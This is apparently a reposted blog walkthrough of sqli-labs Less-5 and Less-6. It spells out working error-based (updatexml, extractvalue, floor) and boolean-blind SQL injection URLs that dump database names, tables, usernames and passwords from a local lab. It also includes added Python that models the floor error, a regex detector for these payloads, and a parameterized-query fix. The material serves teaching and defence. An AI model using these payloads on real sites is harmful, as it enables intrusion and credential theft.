sqli-labs walkthrough: Less-5 and Less-6 (error-based injection, boolean-based blind injection)

Less 5

First we try closing the quote as usual and find no problem:

http://127.0.0.1/sqlilabs/Less-5/?id=1'

After submitting this we only see You are in...... so we apply the approach from the earlier levels:

http://127.0.0.1/sqlilabs/Less-5/?id=1' order by 3--+   order by 3 succeeds: 3 columns
Find the display position and the current database name:
http://127.0.0.1/sqlilabs/Less-5/?id=1' union select 1,2,3--+
http://127.0.0.1/sqlilabs/Less-5/?id=1' union select 1,2,database()--+

No matter what we do, the page only ever shows You are in...... The usual approach does not work here, so we suspect a different kind of injection.

Try error-based injection. It comes in the following types.

The idea of error-based injection:
(1) Error via floor: and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a), where payload is the SQL statement you want to inject. Note that this statement limits the output to 64 characters.
(2) Error via updatexml: and updatexml(1,payload,1)
This statement also limits the output length, to at most 32 characters,
and it also restricts the return type of payload: it only takes effect when the value payload returns is not in XML format.

(3) Error via extractvalue: and extractvalue(1,payload). The output is also length-limited, to at most 32 characters.

0x00 Error-based injection via updatexml

updatexml usage:  and updatexml(1,payload,1)

Get the database name

http://127.0.0.1/sqlilabs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+

The separator ~ is written as 0x7e in hexadecimal

List table names

http://127.0.0.1/sqlilabs/Less-5/?id=-1'  and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)--+

Dump usernames

http://127.0.0.1/sqlilabs/Less-5/?id=-1'  and updatexml(1,concat(0x7e,(select group_concat(username) from users limit 0,1),0x7e),1)--+

Dump passwords

http://127.0.0.1/sqlilabs/Less-5/?id=-1'  and updatexml(1,concat(0x7e,(select group_concat(password) from users limit 0,1),0x7e),1)--+

0x01 Error-based injection via extractvalue

Usage:  and extractvalue(1,payload)

Dump the database name

0x23 is # in hexadecimal

http://127.0.0.1/sqlilabs/Less-5/?id=1'  and extractvalue(1,concat(0x23,(select database()),0x23))--+

Dump table names

http://127.0.0.1/sqlilabs/Less-5/?id=1'  and extractvalue(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x23))--+

Dump column names

http://127.0.0.1/sqlilabs/Less-5/?id=1'  and extractvalue(1,concat(0x23,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),0x23))--+

Get the data

Usernames
http://127.0.0.1/sqlilabs/Less-5/?id=1'  and extractvalue(1,concat(0x23,(select username from users order by id limit 1,1),0x23))--+
Passwords
http://127.0.0.1/sqlilabs/Less-5/?id=1'  and extractvalue(1,concat(0x23,(select password from users order by id limit 1,1),0x23))--+

0x02 Error-based injection via floor

count(*): returns the number of rows matched by the given selection

concat(): concatenates strings, e.g. concat('a','b') gives ab
floor(): rounds down to an integer
rand(): random number function
rand(0): pseudo-random; the numbers it generates follow a fixed pattern
floor(rand(0)*2): the generated values follow the pattern 0110110011101

floor usage:  and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

The floor technique requires that the table being queried contain at least 3 rows.
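To make the "at least 3 rows" condition concrete, here is an added Python model, written for this walkthrough and not taken from the post or from MySQL's source, of how a GROUP BY over a non-deterministic key can end in a duplicate-key error. It assumes a simplified evaluation order: the grouping key is computed once to look it up in the temporary result table and, when the key is new, computed a second time while inserting it, so each new group consumes two values of the 0110110011101 sequence quoted above. The error text is modelled on the MySQL message, and the function names are mine.

```python
from itertools import cycle

# floor(rand(0)*2) sequence exactly as quoted in the post
RAND0_BITS = [0, 1, 1, 0, 1, 1, 0, 0, 1, 1, 1, 0, 1]


def simulate_group_by(payload, n_rows, bits=RAND0_BITS):
    """Model (assumption, not MySQL's real code) of grouping n_rows rows by
    concat(payload, floor(rand(0)*2)) and returning the error, if any."""
    next_bit = cycle(bits).__next__
    groups = {}  # grouping key -> count(*) so far
    for row in range(1, n_rows + 1):
        # first evaluation: look the key up in the temporary table
        lookup_key = f"{payload}{next_bit()}"
        if lookup_key in groups:
            groups[lookup_key] += 1
            continue
        # second evaluation: the key is recomputed when the new entry is inserted,
        # so it may no longer equal the key that was just looked up
        insert_key = f"{payload}{next_bit()}"
        if insert_key in groups:
            # modelled after "Duplicate entry '...' for key 'group_key'";
            # the key text, i.e. the payload, is what the error leaks
            return f"Duplicate entry '{insert_key}' for key 'group_key' (row {row})"
        groups[insert_key] = 1
    return "no error"


def min_rows_to_error(payload, bits=RAND0_BITS, limit=10):
    """Smallest row count at which the modelled GROUP BY fails, or None."""
    for n in range(1, limit + 1):
        if simulate_group_by(payload, n, bits).startswith("Duplicate entry"):
            return n
    return None


if __name__ == "__main__":
    for n in (1, 2, 3):
        print(n, "rows ->", simulate_group_by("security", n))
    print("rows needed:", min_rows_to_error("security"))          # 3
    print("constant key:", simulate_group_by("security", 5, [0]))  # no error
```

Tracing the sequence by hand gives the same answer: row 1 looks up "security0", inserts "security1"; row 2 looks up "security1" and finds it; row 3 looks up "security0", misses, and tries to insert "security1", which already exists. A deterministic key (the constant-bit call) never fails, which is why rand(0) rather than a fixed value is used.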

Dump database names

limit 0,1   database name is information_schema
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 0,1),floor (rand()*2)) as x from information_schema.tables group by x) as a) --+
limit 1,1   database name is challenges
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 1,1),floor (rand()*2)) as x from information_schema.tables group by x) as a) --+
And so on.
But there is a quicker one-step method:
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat((database()),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

Dump table names

http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat(((select concat(table_name) from information_schema.tables where table_schema='security' limit 3,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

Dump column names

http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat(column_name,';') from information_schema.columns where table_name='users' limit 0,1),floor(rand()*2)) as x from information_schema.columns group by x) as a) --+

Get information

Username column
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat(column_name,';') from information_schema.columns where table_name='users' limit 1,1),floor(rand()*2)) as x from information_schema.columns group by x) as a) --+
Password column
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat(column_name,';') from information_schema.columns where table_name='users' limit 2,1),floor(rand()*2)) as x from information_schema.columns group by x) as a) --+

0x03 Boolean-based blind injection

Determine the length of the current database name
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())<10-- -   //page displays normally
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())<7-- -    //page displays abnormally
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())<9-- -    //page displays normally
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())=7-- -    //page displays abnormally
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())=8-- -    //page displays normally
So the current database name is 8 characters long.

Determine the current database name
Taking the first character as an example:
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))>110-- -    //page displays normally
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))>120-- -    //page displays abnormally
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))>115-- -    //page displays abnormally
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))>113-- -    //page displays normally
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))>114-- -    //page displays normally
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))=114-- -    //page displays abnormally
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))=115-- -    //page displays normally
Looking up 115 in the ASCII table, the first letter is "s"; continue in the same way for the remaining characters...

Determine the number of tables
http://127.0.0.1/sqlilabs/Less-5/?id=1'  and (select count(table_name) from information_schema.tables where table_schema=database())=4-- -
Table names
http://127.0.0.1/sqlilabs/Less-5/?id=1'  and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100-- -
The method is the same, so we will not go through every step here.


But a more convenient approach is still to write your own script, or to use tools such as sqlmap or Burp.
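Turning the same material around for the defender: an added Python example, not from the original post, that applies the error-based signatures from the concept section (updatexml, extractvalue, floor(rand(0)*2) combined with group by) and the boolean-blind probe shapes from this section (ascii( or length( followed by a numeric comparison) to URL-decoded request lines. The access-log lines are constructed for the example and assume the common log layout; the rule names and the classify_request/scan_log functions are mine. Matching on the decoded query string matters because the payloads above arrive percent-encoded, and the trailing --+ decodes to a comment only after plus-to-space decoding.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (not real traffic); the targets mirror the
# shapes of the payloads shown in the walkthrough, percent-encoded as a browser sends them.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqlilabs/Less-5/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /sqlilabs/Less-5/?id=1'%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)%20--+ HTTP/1.1" 200 640
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /sqlilabs/Less-5/?id=1'%20and%20extractvalue(1,concat(0x23,(select%20database()),0x23))--+ HTTP/1.1" 200 640
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /sqlilabs/Less-5/?id=1'%20and%20(select%201%20from%20(select%20count(*),concat((database()),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20--+ HTTP/1.1" 200 640
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /sqlilabs/Less-5/?id=1'%20and%20ascii(substr(database(),1,1))>115--%20- HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /sqlilabs/Less-5/?id=2 HTTP/1.1" 200 512
"""

# Signature rules, evaluated against the URL-decoded query string (names are mine)
RULES = [
    ("error-based/updatexml", re.compile(r"updatexml\s*\(", re.I)),
    ("error-based/extractvalue", re.compile(r"extractvalue\s*\(", re.I)),
    ("error-based/floor", re.compile(r"floor\s*\(\s*rand\s*\(.*group\s+by", re.I)),
    # ascii(...) or length(...) compared against a number: one step of a blind probe
    ("boolean-blind", re.compile(r"(ascii|length)\s*\(.*?(=|>|<)\s*\d+", re.I)),
]

# ip - - [time] "METHOD target protocol" ... (common log format, assumed)
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')


def classify_request(raw_query):
    """Return the names of every rule the decoded query string triggers."""
    decoded = unquote_plus(raw_query)  # %20 -> space, + -> space
    return [name for name, rx in RULES if rx.search(decoded)]


def scan_log(text):
    """Yield (client_ip, [rule names]) for each request line that matches a rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        ip, _method, target = m.groups()
        hits = classify_request(urlsplit(target).query)
        if hits:
            findings.append((ip, hits))
    return findings


if __name__ == "__main__":
    for ip, hits in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(hits))
```

The boolean-blind rule fires on a single request, but in practice the signal is the volume: the walkthrough needs several requests per character, so counting boolean-blind hits per client over a short window separates a blind-injection run from an isolated odd request.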

Less 6

Same as level five, except that the closing ' becomes a closing ".
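To close, an added example in Python with sqlite3, written for this walkthrough and not the sqli-labs source (the lab's own PHP is not shown in this post), that models the Less-5 behaviour: a query built by string concatenation whose page only reveals whether a row came back, beside the fix that allow-lists the id as an integer and binds it as a parameter. The users table and its rows are constructed; Less-6 differs only in the closing character, and the same fix covers it because the request value never becomes SQL syntax at all.

```python
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the lab database (not the lab's real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "pw-alice"), (2, "bob", "pw-bob")],
    )
    return conn


def vulnerable_page(conn, id_param):
    """Assumed model of Less-5: the parameter is spliced into the SQL text, and
    the page shows only 'You are in...', nothing, or an error."""
    sql = f"SELECT * FROM users WHERE id='{id_param}' LIMIT 0,1"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return "error"  # the unbalanced quote from ?id=1' lands here
    return "You are in..." if row else ""


def hardened_page(conn, id_param):
    """Fix: require the expected shape (digits only) and bind the value as a
    parameter, so quotes, comments and boolean clauses are never parsed as SQL."""
    if not id_param.isdigit():
        return ""
    row = conn.execute(
        "SELECT * FROM users WHERE id=? LIMIT 0,1", (int(id_param),)
    ).fetchone()
    return "You are in..." if row else ""


if __name__ == "__main__":
    db = build_db()
    for value in ("1", "1'", "1' and 1=1-- -", "1' and 1=2-- -"):
        print(repr(value), "| vulnerable:", repr(vulnerable_page(db, value)),
              "| hardened:", repr(hardened_page(db, value)))
```

The vulnerable function answers the true/false oracle the blind section relies on (1=1 keeps the row, 1=2 drops it), while the hardened one returns the same empty page for every non-numeric input, so neither the page text nor a database error can be steered by the attacker's condition.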


Reposted from blog.csdn.net/weixin_47559704/article/details/121703006